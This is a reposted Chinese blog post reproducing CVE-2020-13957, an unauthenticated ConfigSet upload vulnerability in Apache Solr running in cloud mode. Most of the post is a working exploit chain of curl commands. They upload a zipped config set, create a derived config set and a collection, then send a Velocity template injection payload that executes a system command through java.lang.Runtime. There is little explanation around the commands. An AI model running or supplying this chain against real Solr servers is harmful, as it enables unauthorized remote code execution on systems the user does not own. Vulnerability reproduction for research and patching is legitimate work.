碼上快樂

相關內容    簡體    繁體

CVE-2020-13957 solr未授權復現

本文轉載自   查看原文   2020-10-15 18:23   1494    JAVA/ 安全

需要solr以cloud模式啟動,特征是:

會有一個cloud的功能 。

編譯一個惡意配置:

在對應目錄下依次執行以下shell命令。

/solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf

zip -r - * > mytest.zip

curl -X POST --header "Content-Type:application/octet-stream" --data-binary @mytest.zip "http://127.0.0.1:8983/solr/admin/configs?action=UPLOAD&name=mytest" #注冊一個配置文件集合為mytest

curl "http://127.0.0.1:8983/api/cluster/configs?omitHeader=true" #查詢配置文件集合是否上傳成功

curl "http://127.0.0.1:8983/solr/admin/configs?action=CREATE&name=mytest2&baseConfigSet=mytest&configSetProp.immutable=false&wt=xml&omitHeader=true"

curl "http://127.0.0.1:8983/solr/admin/collections?action=CREATE&name=mytest&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest2" #使用之前上傳的配置文件集合為mytest

curl -v "http://127.0.0.1:8983/solr/mytest/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"

最后執行命令:


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 【漏洞復現】CVE-2020-13957|Apache Solr ConfigSet API未授權上傳漏洞 CVE-2020-14882 weblogic 未授權命令執行復現 CVE-2020-14882 weblogic 未授權命令執行復現 Weblogic未授權遠程命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現 weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883)復現 Weblogic未授權遠程命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現 CVE-2020-14882&14883weblogic未授權命令執行漏洞復現 【漏洞復現】ThinkAdmin v5和v6 未授權列目錄任意文件讀取(CVE-2020-25540) CVE-2021-22214 Gitlab API未授權SSRF復現 Jira未授權SSRF漏洞復現(CVE-2019-8451)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM